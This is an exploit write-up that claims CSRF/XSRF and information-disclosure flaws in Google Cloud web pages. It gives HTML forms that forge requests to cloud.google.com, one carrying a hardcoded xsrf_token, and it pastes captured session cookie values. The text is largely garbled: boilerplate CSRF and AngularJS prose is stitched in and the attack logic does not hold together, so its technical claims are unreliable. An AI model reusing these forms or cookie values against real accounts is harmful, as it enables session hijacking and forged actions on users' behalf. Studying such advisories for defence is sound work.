/************************************************************************************************
[+] Title : Google Cloud CSRF/XSRF
[+] Exploit Author : Ashiyane Digital Security Team
[+] Tested on : Windows - Firefox
[+] Vendor Homepage : http://cloud.google.com
[+] Date : 16 Feb. 2016
*************************************************************************************************/
------------------------------------------------------
MeThod GET In CSRF Exploitation :
------------------------------------------------------
In a Cross Site Request Forgery (CSRF or XSRF) attack,a malicious site gets an
unsuspecting user to make a secret HTTP request back to a legitimate site,forcing
an unintentional action.To prevent such attacks,you need to verify that an
incoming HTTP request came from an authenticated user under normal circumstances.
In HTTP GET using methods described above, such as a simple hyperlink
containing manipulated parameters and automatically loaded by a IMG tag.
By the HTTP specification however, GET should be used as a safe method,
that is, not significantly changing user's state in the application or Website .
--------------------------------------------------------------
Snippet Index Page For Test TEXT Query :
-------------------------------------------------------------
<form action="https://cloud.google.com/s/results" name="Ashexpl" enctype="multipart/form-data" method="get">
<div id="searchbox" class="devsite-searchbox">
<input type="text" placeholder="Put TEXT Here" class="devsite-search-query" name="q" autocomplete="off"></div>
<button id="search-button" class="button button-blue big">
<img src="https://cloud.google.com/_static/8ceb0d7f64/images/v2/search.png" href="javascript:void(0)" alt="Search"></button>
<input type="hidden" name="p" id="search_project" value="" data-project-name="Cloud Platform" data-project-path="" data-query-match=""/>
<input type="hidden" id="suggest-category-label-2" value="Pages in Cloud Platform" />
<input type="hidden" id="suggest-category-label-3" value="Reference in Cloud Platform" />
<input type="hidden" id="suggest-category-label-1" value="Products" />
<input type="hidden" id="suggest-all-results-label" value="See all results for" />
</form>
%%%---------------------------------------------------------------------------------------------------%%%
# Snippet Code is no security token , not even a captcha security image,...
%%%----------------------------------------------------------------------------------------------------%%%
-----------------------------------------------------------------------------
Monitoring Request By Add-On Live HTTP Headers :
----------------------------------------------------------------------------
Host: cloud.google.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://cloud.google.com/s/results?q=Put TEXT Here
Cookie: NID=76=rRbuP4kHDyns4naaQjW6wcyMB-Xw9n6N2xIlgHNWYfIaxs2K-dfsm-
ow5-XYPtHxIx5VciM56o3yOfbyXEPIV1YMgC2SY; OGPC=5061821-25:4061130-15:5061869-4
:5061921-6:; OGP=-5061451:; SID=DQAAANcAAAC7oVKxr3-
SwGXYeIdJt_3Gn2nIKr9WKH8cSft2ocgbQ7JNqjpnH9KS7eZ8spjf0GYFEWCQQpzwWp_
p_KoKHubovAbg; HSID=AA75jBY4zgwnmoJx-; SSID=AZhL_E8sQ9Pg5kV3Q; APISID=2EKrcpqeeR0u
-St8/ApVPiHB2Cduyt__zU; SAPISID=uROLX92fAIFv2pX8/AkL_cuURan_o4uNMp;
_ga=GA1.3.666289654.1455044406; __utmz=undefined=undefined|utm_term=
undefined|utm_medium=undefined|utm_content__c=undefined|utm_campaign__c=
undefined|utm_source__c=undefined|
Connection: keep-alive
-----------------------------------------------------------------------------------------
Warning GET Request (Information Disclosure Vulnerability) :
-----------------------------------------------------------------------------------------
Description :
The security vulnerability can be exploited by remote attackers without
privilege Cloud system , GET Request View Detail Cloud .
Vulnerability : https://cloud.google.com/_s/getsuggestions?hl=en&s=cloud&c=1
///--------------------------------------------------------------------------------------------------------------------------------------///
-------------------------------
XSRF Exploitation :
-------------------------------
This restriction means that the malicious domain will not be able to echo cookie
values in any sort of programmatic way, such as injecting them as an HTTP header.
When you make requests using the $http service (or anything built on top
of $http, like $resource), AngularJS will look for the existence of the
"XSRF-TOKEN" cookie. And, if it finds it, it will append the cookie value as
the outgoing HTTP Header, "X-XSRF-TOKEN." This means that when you set the XSRF
token cookie, AngularJS will send two tokens through which each HTTP AJAX request:
[+] The cookie, XSRF-TOKEN.
[+] The header, X-XSRF-TOKEN.
--------------------------------------------
XSRF Token in GET request :
--------------------------------------------
https://tools.digitalpoint.com/cookie-search?action=cloud.google.com
In Subdomain Google Cookies Seen In Last 24h , The cookie, XSRF-TOKEN by view :
Browser Firefox : view-source:https://cloud.google.com/
-------------------------------------------------------
XSRF Exploitation & Cookie Stealer :
-------------------------------------------------------
Description :
In this form we try to represent a value xsrf_token which amount is to see any visits
Which can be used to steal it and set out with your data, Snippet Code :
<form action="https://cloud.google.com/i18n/setlang/" method="post">
<input type="hidden" name="xsrf_token" value="kkLdJ1sQCXWmd7KAKiKNgAfVJhGqDVU-OXlcyiwb2wk6MTQ1NTIxNTEwMjkwOTI5MA" />
<select name="language" onchange="this.form.submit(); return false;">
<option value="en" selected>English</option>
<option value="ja">日本語</option>
</select>
</form>
///-----------------------------------------------------------------------///
/--------------------------------------------------
Discovered By Und3rgr0und
-------------------------------------------------/